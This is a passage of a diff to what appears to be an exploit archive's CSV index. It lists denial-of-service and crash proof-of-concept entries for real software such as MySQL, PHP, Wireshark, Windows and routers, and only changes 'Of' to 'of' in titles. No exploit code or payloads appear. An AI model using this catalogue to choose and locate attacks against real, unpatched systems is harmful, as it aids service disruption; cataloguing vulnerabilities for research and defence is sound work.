Overflow (SEH)",2014-08-29,"Moroccan Kingdom (MKD)",windows,dos,0 34480,platforms/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b - '.ogg' Buffer Overflow",2010-08-16,"Praveen Darshanam",windows,dos,0 34502,platforms/windows/dos/34502.py,"Serveez 0.1.7 - 'If-Modified-Since' Header Stack Buffer Overflow",2009-08-09,"lvac lvac",windows,dos,0 -34505,platforms/php/dos/34505.txt,"MySQL 5.1.48 - 'Temporary InnoDB' Tables Denial Of Service",2010-08-19,"Boris Reisig",php,dos,0 -34506,platforms/linux/dos/34506.txt,"MySQL 5.1.48 - 'EXPLAIN' Denial Of Service",2010-08-20,"Bjorn Munch",linux,dos,0 -34510,platforms/linux/dos/34510.txt,"OraclMySQL 5.1.48 - 'LOAD DATA INFILE' Denial Of Service",2010-08-20,"Elena Stepanova",linux,dos,0 +34505,platforms/php/dos/34505.txt,"MySQL 5.1.48 - 'Temporary InnoDB' Tables Denial of Service",2010-08-19,"Boris Reisig",php,dos,0 +34506,platforms/linux/dos/34506.txt,"MySQL 5.1.48 - 'EXPLAIN' Denial of Service",2010-08-20,"Bjorn Munch",linux,dos,0 +34510,platforms/linux/dos/34510.txt,"OraclMySQL 5.1.48 - 'LOAD DATA INFILE' Denial of Service",2010-08-20,"Elena Stepanova",linux,dos,0 35592,platforms/windows/dos/35592.py,"jetAudio 8.1.3 Basic (mp3) - Crash (PoC)",2014-12-23,"Drozdova Liudmila",windows,dos,0 -34520,platforms/linux/dos/34520.txt,"Oracle MySQL 5.1.48 - 'HANDLER' Interface Denial Of Service",2010-08-20,"Matthias Leich",linux,dos,0 -34521,platforms/linux/dos/34521.txt,"Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial Of Service",2010-08-20,"Shane Bester",linux,dos,0 -34522,platforms/linux/dos/34522.txt,"Oracle MySQL < 5.1.49 - 'DDL' Statements Denial Of Service",2010-07-09,"Elena Stepanova",linux,dos,0 +34520,platforms/linux/dos/34520.txt,"Oracle MySQL 5.1.48 - 'HANDLER' Interface Denial of Service",2010-08-20,"Matthias Leich",linux,dos,0 +34521,platforms/linux/dos/34521.txt,"Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service",2010-08-20,"Shane Bester",linux,dos,0 +34522,platforms/linux/dos/34522.txt,"Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service",2010-07-09,"Elena Stepanova",linux,dos,0 34530,platforms/windows/dos/34530.py,"Crystal Player 1.98 - '.mls' Buffer Overflow",2010-08-20,"Praveen Darshanam",windows,dos,0 34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) (Python)",2014-09-05,"Robert Kugler",windows,dos,0 34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilities",2014-09-09,jsass,aix,dos,0 @@ -4367,13 +4366,13 @@ id,file,description,date,author,platform,type,port 40101,platforms/multiple/dos/40101.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (7)",2016-07-13,COSIG,multiple,dos,0 40102,platforms/multiple/dos/40102.txt,"Adobe Flash Player 22.0.0.192 - DefineBitsJPEG2 Memory Corruption",2016-07-13,COSIG,multiple,dos,0 40103,platforms/multiple/dos/40103.txt,"Adobe Flash Player 22.0.0.192 - DefineSprite Memory Corruption",2016-07-13,COSIG,multiple,dos,0 -35061,platforms/linux/dos/35061.c,"GNU glibc - 'regcomp()' Stack Exhaustion Denial Of Service",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0 +35061,platforms/linux/dos/35061.c,"GNU glibc - 'regcomp()' Stack Exhaustion Denial of Service",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0 35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0 35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0 35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Buffer Overflow/Denial of Service EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0 35153,platforms/osx/dos/35153.c,"Apple Mac OSX (Mavericks) - IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0 35154,platforms/asp/dos/35154.txt,"Sigma Portal - 'ShowObjectPicture.aspx' Denial of Service",2010-12-27,"Pouya Daneshmand",asp,dos,0 -35158,platforms/windows/dos/35158.py,"Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial Of Service",2010-12-27,JohnLeitch,windows,dos,0 +35158,platforms/windows/dos/35158.py,"Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial of Service",2010-12-27,JohnLeitch,windows,dos,0 35162,platforms/linux/dos/35162.cob,"GIMP 2.6.7 - Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0 35163,platforms/windows/dos/35163.c,"ImgBurn 2.4 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-01-01,d3c0der,windows,dos,0 35164,platforms/php/dos/35164.php,"PHP 5.3.2 - 'zend_strtod()' Function Floating-Point Value Denial of Service",2011-01-03,"Rick Regan",php,dos,0 @@ -4381,22 +4380,22 @@ id,file,description,date,author,platform,type,port 35178,platforms/windows/dos/35178.py,"i.Hex 0.98 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0 35179,platforms/windows/dos/35179.py,"i.Mage 1.11 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0 35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0 -35202,platforms/windows/dos/35202.py,"Microsoft Internet Explorer 11 - Denial Of Service",2014-11-10,"Behrooz Abbassi",windows,dos,0 +35202,platforms/windows/dos/35202.py,"Microsoft Internet Explorer 11 - Denial of Service",2014-11-10,"Behrooz Abbassi",windows,dos,0 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File - 'CdrTxt.dll' Off-by-One Stack Corruption",2014-11-12,LiquidWorm,windows,dos,0 35240,platforms/linux/dos/35240.c,"acpid 1.0.x - Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",linux,dos,0 -35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 - Malformed Message Denial Of Service",2011-01-19,"Craig Freyman",windows,dos,0 +35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 - Malformed Message Denial of Service",2011-01-19,"Craig Freyman",windows,dos,0 35279,platforms/osx/dos/35279.html,"Apple Mac OSX Safari 8.0 - Crash (PoC)",2014-11-17,w3bd3vil,osx,dos,0 35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,linux,dos,31337 35304,platforms/multiple/dos/35304.txt,"Oracle Java - Floating-Point Value Denial of Service",2011-02-01,"Konstantin Preisser",multiple,dos,0 35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - 'win32k.sys' Denial of Service",2014-11-22,Kedamsky,windows,dos,0 35339,platforms/multiple/dos/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - Denial of Service (Resource Consumption)",2014-11-24,CovertCodes,multiple,dos,0 35342,platforms/aix/dos/35342.txt,"RobotStats 1.0 - HTML Injection",2014-11-24,"ZoRLu Bugrahan",aix,dos,0 -35345,platforms/hardware/dos/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,dos,0 -35354,platforms/php/dos/35354.txt,"PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference Denial Of Service",2011-02-17,"Maksymilian Arciemowicz",php,dos,0 +35345,platforms/hardware/dos/35345.txt,"TP-Link TL-WR740N - Denial of Service",2014-11-24,LiquidWorm,hardware,dos,0 +35354,platforms/php/dos/35354.txt,"PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference Denial of Service",2011-02-17,"Maksymilian Arciemowicz",php,dos,0 35358,platforms/php/dos/35358.txt,"PHP 5.5.12 - Locale::parseLocale Memory Corruption",2014-11-24,"John Leitch",php,dos,0 35359,platforms/multiple/dos/35359.txt,"tcpdump 4.6.2 - Geonet Decoder Denial of Service",2014-11-24,"Steffen Bauch",multiple,dos,0 35363,platforms/windows/dos/35363.txt,"TRENDnet SecurView Wireless Network Camera TV-IP422WN - 'UltraCamX.ocx' Stack Buffer Overflow",2014-11-25,LiquidWorm,windows,dos,0 -35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 - Malformed Packet Null Pointer Dereference Remote Denial Of Service",2011-02-22,"Luigi Auriemma",multiple,dos,0 +35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 - Malformed Packet Null Pointer Dereference Remote Denial of Service",2011-02-22,"Luigi Auriemma",multiple,dos,0 35379,platforms/windows/dos/35379.go,"Elipse E3 - HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80 35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0 35403,platforms/linux/dos/35403.c,"Linux Kernel 2.6.x - epoll Nested Structures Local Denial of Service",2011-03-02,"Nelson Elhage",linux,dos,0 @@ -4404,8 +4403,8 @@ id,file,description,date,author,platform,type,port 35413,platforms/php/dos/35413.php,"WordPress 4.0 - Denial of Service",2014-12-01,SECURELI.com,php,dos,80 35414,platforms/php/dos/35414.txt,"WordPress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,dos,80 35415,platforms/php/dos/35415.txt,"Drupal < 7.34 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,dos,80 -35432,platforms/linux/dos/35432.txt,"Wireshark 1.4.3 - NTLMSSP Null Pointer Dereference Denial Of Service",2011-03-01,"Buildbot Builder",linux,dos,0 -35437,platforms/multiple/dos/35437.pl,"Air Contacts Lite - HTTP Packet Denial Of Service",2011-02-09,"Rodrigo Escobar",multiple,dos,0 +35432,platforms/linux/dos/35432.txt,"Wireshark 1.4.3 - NTLMSSP Null Pointer Dereference Denial of Service",2011-03-01,"Buildbot Builder",linux,dos,0 +35437,platforms/multiple/dos/35437.pl,"Air Contacts Lite - HTTP Packet Denial of Service",2011-02-09,"Rodrigo Escobar",multiple,dos,0 35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service",2011-01-03,"Serge Dubrouski",linux,dos,0 35465,platforms/multiple/dos/35465.pl,"VideoLAN VLC Media Player 1.0.5 - '.ape' Denial of Service",2011-03-15,KedAns-Dz,multiple,dos,0 35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 - Tag Nesting Remote Denial of Service",2010-12-21,anonymous,linux,dos,0 @@ -4426,13 +4425,13 @@ id,file,description,date,author,platform,type,port 35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0 < 0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0 35589,platforms/windows/dos/35589.py,"Notepad++ 6.6.9 - Buffer Overflow",2014-12-22,TaurusOmar,windows,dos,0 35600,platforms/linux/dos/35600.c,"Linux Kernel 2.6.x - 'inotify_init1()' Double-Free Local Denial of Service",2011-04-11,anonymous,linux,dos,0 -35613,platforms/multiple/dos/35613.py,"TOTVS ERP Microsiga Protheus 8/10 - Memory Corruption (Denial Of Service)",2011-04-13,waKKu,multiple,dos,0 +35613,platforms/multiple/dos/35613.py,"TOTVS ERP Microsiga Protheus 8/10 - Memory Corruption (Denial of Service)",2011-04-13,waKKu,multiple,dos,0 35622,platforms/windows/dos/35622.txt,"Wickr Desktop 2.2.1 Windows - Denial of Service",2014-12-27,Vulnerability-Lab,windows,dos,0 35656,platforms/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow",2011-04-25,KedAns-Dz,windows,dos,0 35654,platforms/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service",2011-04-25,"Antu Sanadi",windows,dos,0 -35725,platforms/multiple/dos/35725.pl,"Perl 5.10 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",multiple,dos,0 +35725,platforms/multiple/dos/35725.pl,"Perl 5.10 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",multiple,dos,0 35738,platforms/linux/dos/35738.php,"Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service",2011-05-12,"Maksymilian Arciemowicz",linux,dos,0 -35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon - Denial Of Service",2011-05-16,Knud,multiple,dos,0 +35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon - Denial of Service",2011-05-16,Knud,multiple,dos,0 35771,platforms/osx/dos/35771.c,"Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 35772,platforms/osx/dos/35772.c,"Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 35773,platforms/osx/dos/35773.c,"Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 @@ -4447,10 +4446,10 @@ id,file,description,date,author,platform,type,port 35859,platforms/hardware/dos/35859.py,"Zhone GPON 2520 R4.0.2.566b - Crash (PoC)",2015-01-21,"Kaczinski Ramirez",hardware,dos,0 35869,platforms/windows/dos/35869.txt,"Crystal Player 1.99 - Memory Corruption",2015-01-21,"Kapil Soni",windows,dos,0 35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - Buffer Overflow (SEH)",2015-01-22,"Osanda Malith",windows,dos,0 -35873,platforms/windows/dos/35873.txt,"Wireshark 1.4.5 - 'bytes_repr_len()' Null Pointer Dereference Denial Of Service",2011-06-17,rouli,windows,dos,0 +35873,platforms/windows/dos/35873.txt,"Wireshark 1.4.5 - 'bytes_repr_len()' Null Pointer Dereference Denial of Service",2011-06-17,rouli,windows,dos,0 35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 - 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0 35889,platforms/windows/dos/35889.py,"IceCream Ebook Reader 1.41 - Crash (PoC)",2015-01-23,"Kapil Soni",windows,dos,0 -35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial Of Service",2011-06-28,"Luigi Auriemma",windows,dos,0 +35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial of Service",2011-06-28,"Luigi Auriemma",windows,dos,0 35913,platforms/android/dos/35913.txt,"Android WiFi-Direct - Denial of Service",2015-01-26,"Core Security",android,dos,0 35938,platforms/freebsd/dos/35938.txt,"FreeBSD Kernel - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0 35939,platforms/hardware/dos/35939.txt,"Alice Modem 1111 - 'rulename' Parameter Cross-Site Scripting / Denial of Service",2011-07-12,"Moritz Naumann",hardware,dos,0 @@ -4460,15 +4459,15 @@ id,file,description,date,author,platform,type,port 36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' Buffer Overflow (SEH) (PoC)",2015-02-09,"Samandeep Singh",windows,dos,0 36024,platforms/linux/dos/36024.txt,"Chemtool 1.6.14 - Memory Corruption",2015-02-08,"Pablo González",linux,dos,0 36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server 4.0.2 - Null Pointer Dereference Remote Denial of Service",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0 -36070,platforms/php/dos/36070.txt,"PHP < 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0 +36070,platforms/php/dos/36070.txt,"PHP < 5.3.7 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0 36071,platforms/windows/dos/36071.py,"Xlight FTP Server 3.7 - Remote Buffer Overflow",2011-08-19,KedAns-Dz,windows,dos,0 36092,platforms/windows/dos/36092.pl,"MapServer 6.0 - '.Map' File Double-Free Remote Denial of Service",2011-08-30,rouault,windows,dos,0 36128,platforms/windows/dos/36128.txt,"Wireshark 1.6.1 - Malformed Packet Trace File Remote Denial of Service",2011-09-08,Wireshark,windows,dos,0 36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)",2015-02-22,"Praveen Darshanam",windows,dos,0 36158,platforms/php/dos/36158.txt,"PHP DateTime - Use-After-Free",2015-02-23,"Taoguang Chen",php,dos,0 36190,platforms/linux/dos/36190.txt,"SQLite3 3.8.6 - Controlled Memory Corruption (PoC)",2015-02-26,"Andras Kabai",linux,dos,0 -36198,platforms/multiple/dos/36198.pl,"Polipo 1.0.4.1 - POST/PUT Requests HTTP Header Processing Denial Of Service",2011-10-01,"Usman Saeed",multiple,dos,0 -36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service",2011-04-11,"Luigi Auriemma",windows,dos,0 +36198,platforms/multiple/dos/36198.pl,"Polipo 1.0.4.1 - POST/PUT Requests HTTP Header Processing Denial of Service",2011-10-01,"Usman Saeed",multiple,dos,0 +36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial of Service",2011-04-11,"Luigi Auriemma",windows,dos,0 36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 - Buffer Overflow / Denial of Service",2011-10-13,"Fredrik Widlund",multiple,dos,0 36247,platforms/multiple/dos/36247.txt,"Splunk 4.1.6 Web Component - Remote Denial of Service",2011-10-20,"Filip Palian",multiple,dos,0 36260,platforms/windows/dos/36260.txt,"Opera Web Browser 11.52 - Escape Sequence Stack Buffer Overflow Denial of Service",2011-10-28,"Marcel Bernhardt",windows,dos,0 @@ -4477,13 +4476,13 @@ id,file,description,date,author,platform,type,port 36268,platforms/linux/dos/36268.c,"Linux Kernel 3.16.3 - Associative Array Garbage Collection Crash (PoC)",2015-03-04,"Emeric Nasi",linux,dos,0 36271,platforms/osx/dos/36271.py,"Apple Mac OSX 10.6.5 / iOS 4.3.3 Mail - Denial of Service",2011-10-29,shebang42,osx,dos,0 36285,platforms/windows/dos/36285.c,"Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow",2011-11-08,anonymous,windows,dos,0 -36288,platforms/multiple/dos/36288.php,"Multiple Vendors - libc 'regcomp()' Stack Exhaustion Denial Of Service",2011-11-04,"Maksymilian Arciemowicz",multiple,dos,0 +36288,platforms/multiple/dos/36288.php,"Multiple Vendors - libc 'regcomp()' Stack Exhaustion Denial of Service",2011-11-04,"Maksymilian Arciemowicz",multiple,dos,0 36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow",2011-11-11,swami,windows,dos,0 36309,platforms/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash (PoC)",2015-03-08,"Loudiyi Mohamed",hardware,dos,0 36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion - Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0 36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0 36336,platforms/windows/dos/36336.txt,"Microsoft Windows - Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0 -36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Command Remote Denial Of Service",2011-11-25,"Houssam Sahli",windows,dos,0 +36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Command Remote Denial of Service",2011-11-25,"Houssam Sahli",windows,dos,0 36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - HTTP POST Request Null Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 36378,platforms/multiple/dos/36378.txt,"CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 36405,platforms/windows/dos/36405.txt,"Serv-U FTP Server 11.1.0.3 - Denial of Service / Security Bypass",2011-12-05,"Luigi Auriemma",windows,dos,0 @@ -4503,19 +4502,19 @@ id,file,description,date,author,platform,type,port 36622,platforms/windows/dos/36622.pl,"UltraPlayer 2.112 Malformed - '.avi' File Denial of Service",2012-01-24,KedAns-Dz,windows,dos,0 36633,platforms/linux/dos/36633.txt,"Wireshark - Buffer Underflow / Denial of Service",2012-01-10,"Laurent Butti",linux,dos,0 36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0 -36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial Of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0 -36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial Of Service",2011-09-24,anonymous,php,dos,0 +36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0 +36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,php,dos,0 36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 (x86) - (PoC)",2015-04-13,sleepya,linux,dos,0 36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0 36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0 36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80 36788,platforms/windows/dos/36788.txt,"Oracle - Outside-In '.DOCX' File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos,0 -36789,platforms/php/dos/36789.php,"PHP 5.3.8 - Remote Denial Of Service",2011-12-18,anonymous,php,dos,0 +36789,platforms/php/dos/36789.php,"PHP 5.3.8 - Remote Denial of Service",2011-12-18,anonymous,php,dos,0 36814,platforms/osx/dos/36814.c,"Apple Mac OSX - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0 36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server Denial of Service",2015-04-23,"Koorosh Ghorbani",hardware,dos,80 36840,platforms/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)",2015-04-27,"Avinash Thapa",multiple,dos,0 36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash (PoC)",2015-04-28,"Avinash Thapa",windows,dos,0 -36868,platforms/hardware/dos/36868.pl,"Mercury MR804 Router - Multiple HTTP Header Fields Denial Of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos,0 +36868,platforms/hardware/dos/36868.pl,"Mercury MR804 Router - Multiple HTTP Header Fields Denial of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos,0 36869,platforms/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 - 'SELECT' Statement 'WHERE' Condition Denial of Service",2012-02-09,IBM,multiple,dos,0 36881,platforms/multiple/dos/36881.txt,"TestDisk 6.14 - Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos,0 36896,platforms/windows/dos/36896.pl,"Splash PRO 1.12.1 - '.avi' File Denial of Service",2012-03-03,"Senator of Pirates",windows,dos,0 @@ -4527,11 +4526,11 @@ id,file,description,date,author,platform,type,port 37036,platforms/linux/dos/37036.txt,"Flock 2.6.1 - Denial of Service",2012-03-31,r45c4l,linux,dos,0 37051,platforms/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use-After-Free (Denial of Service)",2015-05-18,"Denis Andzakovic",linux,dos,0 37053,platforms/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) (PoC)",2015-05-18,"Marcus Meissner",multiple,dos,0 -37061,platforms/multiple/dos/37061.txt,"Sony Bravia KDL-32CX525 - 'hping' Command Remote Denial Of Service",2012-04-05,"Gabriel Menezes Nunes",multiple,dos,0 +37061,platforms/multiple/dos/37061.txt,"Sony Bravia KDL-32CX525 - 'hping' Command Remote Denial of Service",2012-04-05,"Gabriel Menezes Nunes",multiple,dos,0 37068,platforms/windows/dos/37068.py,"ZOC SSH Client - Buffer Overflow (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0 37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 - (Registration ID) Buffer Overflow (PoC)",2015-05-26,LiquidWorm,windows,dos,0 37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash (PoC)",2015-05-29,3unnym00n,windows,dos,22 -37160,platforms/windows/dos/37160.pl,"Universal Reader 1.16.740.0 - 'uread.exe' Denial Of Service",2012-05-14,demonalex,windows,dos,0 +37160,platforms/windows/dos/37160.pl,"Universal Reader 1.16.740.0 - 'uread.exe' Denial of Service",2012-05-14,demonalex,windows,dos,0 37187,platforms/windows/dos/37187.py,"Jildi FTP Client - Buffer Overflow (PoC)",2015-06-03,metacom,windows,dos,21 37188,platforms/windows/dos/37188.txt,"WebDrive 12.2 (B4172) - Buffer Overflow",2015-06-03,Vulnerability-Lab,windows,dos,0 37199,platforms/hardware/dos/37199.txt,"ZTE AC 3633R USB Modem - Multiple Vulnerabilities",2015-06-04,Vishnu,hardware,dos,0 @@ -4563,7 +4562,7 @@ id,file,description,date,author,platform,type,port 37477,platforms/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal - Escape Sequence Parsing Remote Denial of Service",2012-07-03,"Kevin Fenzi",linux,dos,0 37478,platforms/multiple/dos/37478.txt,"plow - '.plowrc' File Buffer Overflow",2012-07-03,"Jean Pascal Pereira",multiple,dos,0 37480,platforms/windows/dos/37480.pl,"Solar FTP Server - Denial of Service",2012-07-05,coolkaveh,windows,dos,0 -37487,platforms/multiple/dos/37487.txt,"Apache Sling - Denial Of Service",2012-07-06,IOactive,multiple,dos,0 +37487,platforms/multiple/dos/37487.txt,"Apache Sling - Denial of Service",2012-07-06,IOactive,multiple,dos,0 37546,platforms/linux/dos/37546.pl,"File Roller v3.4.1 - Denial of Service (PoC)",2015-07-09,Arsyntex,linux,dos,0 37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900 37518,platforms/multiple/dos/37518.html,"Arora Browser - Remote Denial of Service",2012-07-18,t3rm!n4t0r,multiple,dos,0 @@ -4572,7 +4571,7 @@ id,file,description,date,author,platform,type,port 37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0 37558,platforms/windows/dos/37558.txt,"Notepad++ 6.7.3 - Crash (PoC)",2015-07-10,"Rahul Pratap Singh",windows,dos,0 37562,platforms/multiple/dos/37562.pl,"NTPD - MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123 -37568,platforms/windows/dos/37568.pl,"VideoLAN VLC Media Player 2.0.2 - '.3gp' File Divide-by-Zero Denial Of Service",2012-08-02,Dark-Puzzle,windows,dos,0 +37568,platforms/windows/dos/37568.pl,"VideoLAN VLC Media Player 2.0.2 - '.3gp' File Divide-by-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0 37593,platforms/windows/dos/37593.py,"Full Player 8.2.1 - Memory Corruption (PoC)",2015-07-13,"SATHISH ARTHAR",windows,dos,0 37607,platforms/windows/dos/37607.py,"Internet Download Manager - '.ief' Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos,0 37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos,0 @@ -4719,22 +4718,22 @@ id,file,description,date,author,platform,type,port 38262,platforms/osx/dos/38262.txt,"Apple Mac OSX Regex Engine (TRE) - (Integer Signedness and Overflow) Multiple Vulnerabilities",2015-09-22,"Google Security Research",osx,dos,0 38263,platforms/osx/dos/38263.txt,"Apple Mac OSX Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos,0 38264,platforms/osx/dos/38264.txt,"Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow",2015-09-22,"Google Security Research",osx,dos,0 -38265,platforms/win_x86/dos/38265.txt,"Microsoft Windows - Kernel Bitmap Handling Use-After-Free (MS15-061) (2)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38266,platforms/win_x86/dos/38266.txt,"Microsoft Windows - Kernel DeferWindowPos Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38267,platforms/win_x86/dos/38267.txt,"Microsoft Windows - Kernel UserCommitDesktopMemory 